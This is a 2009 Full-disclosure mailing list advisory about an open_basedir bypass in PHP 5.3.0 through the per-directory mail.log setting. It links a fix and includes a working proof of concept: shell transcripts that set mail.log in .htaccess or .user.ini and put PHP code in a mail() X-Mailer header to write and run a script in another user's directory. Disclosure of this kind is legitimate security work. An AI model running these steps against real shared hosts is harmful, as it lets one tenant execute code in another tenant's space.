[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] PHP 5.3.0 (main.c) open_basedir bypass
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] PHP 5.3.0 (main.c) open_basedir bypass
- From: Maksymilian Arciemowicz <cxib@xxxxxxxxxxxxxxxxxx>
- Date: Fri, 07 Aug 2009 15:26:50 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[ PHP 5.3.0 (main.c) open_basedir bypass ]
Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - - Dis.: 26.05.2009
- - - Pub.: 06.08.2009
Risk: Medium
Affected Software:
PHP 5.3.0
Original URL:
http://securityreason.com/achievement_securityalert/64
- - --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.
http://lu2.php.net/manual/en/mail.configuration.php
mail.log NULL PHP_INI_SYSTEM|PHP_INI_PERDIR Available
since PHP 5.3.0.
- - --- 1. PHP 5.3.0 (main.c) open_basedir bypass ---
The first issue exists in main/main.c
- - ---
STD_PHP_INI_ENTRY("mail.log", NULL,
PHP_INI_SYSTEM|PHP_INI_PERDIR, OnUpdateString,
mail_log, php_core_globals, core_globals)
- - ---
Access PHP_INI_PERDIR is accepted by .htaccess (Apache) or .user.ini (CGI).
Function OnUpdateString dosen't check open_basedir. To reason, we need
create new function OpUpdateMailLog, where open_basedir will be checked.
Exploit:
127# cat /www/home/cx/show.php
<?php
echo ini_get('open_basedir')."\n";
?>
127# curl http://localhost/home/cx/show.php
/www/home/cx
127# cat /www/home/cx/set.php
<?php
echo ini_set('mail.log', '/www/home/gpkc/tmp/')."\n";
?>
127# curl http://localhost/home/cx/set.php
Warning: ini_set(): open_basedir restriction in effect.
File(/www/home/gpkc/tmp/) is not within the allowed path(s):
(/www/home/cx) in /www/home/cx/set.php on line 2
We need create .htaccess or .user.ini
for Apache SAPI:
127# echo 'php_value mail.log /www/home/gkpc/tmp/exploit.php' > ./.htaccess
for CGI:
127# echo 'mail.log = /www/home/gkpc/tmp/exploit.php' > ./.user.ini
and some file with mail() function inside. In header X-Mailer, we can
put some php code to execute in other open_basedir range, like:
<?php echo ini_get('open_basedir');?>
127# cat /www/home/cx/runmail.php
<?php
$to = 'stop@xxxxxxxx';
$subject = 'open_basedir bypass by http://securityreason.com';
$message = 'exploit';
$headers = 'From: stop@xxxxxxxx' . "\r\n" .
'Reply-To: stop@xxxxxxxx' . "\r\n" .
'X-Mailer: PHP<?php echo ini_get(\'open_basedir\');?>/' . phpversion();
mail($to, $subject, $message, $headers);
?>
127# curl http://localhost/home/cx/runmail.php
127# ls -la /www/home/gkpc/tmp/exploit.php
- - -rw-r--r-- 1 www www 173 Jun 30 05:20 /www/home/gkpc/tmp/exploit.php
Finish!
Now we can exec evil script exploit.php via httpd.
127# curl http://localhost/home/gkpc/tmp/exploit.php
mail() on [/www/home/cx/runmail.php:9]: To: stop@xxxxxxxx -- Headers:
From: stop@xxxxxxxx Reply-To: stop@xxxxxxxx X-Mailer:
PHP/www/home/gkpc/5.3.0
exploit.php is now in open_basedir=/www/home/gkpc/ range.
- - --- 2. Fix ---
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/main/main.c
- - --- 3. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3
- - --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securityreason [d00t>com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
- -----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAkp7FY4ACgkQpiCeOKaYa9YP7ACeKLHh47A/PJo7oPducKF/Iu0N
SZMAn0dMdoqrEnwYZeB2KuzlCK7wc/rB
=jSMc
- -----END PGP SIGNATURE-----
-----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAkp8K5kACgkQpiCeOKaYa9Yv0wCgulgKdIlAx8fErD+/f7Do/hbs
qpQAn3VloWZCINo3wmqt4+uIo/m3fO7c
=0K2+
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/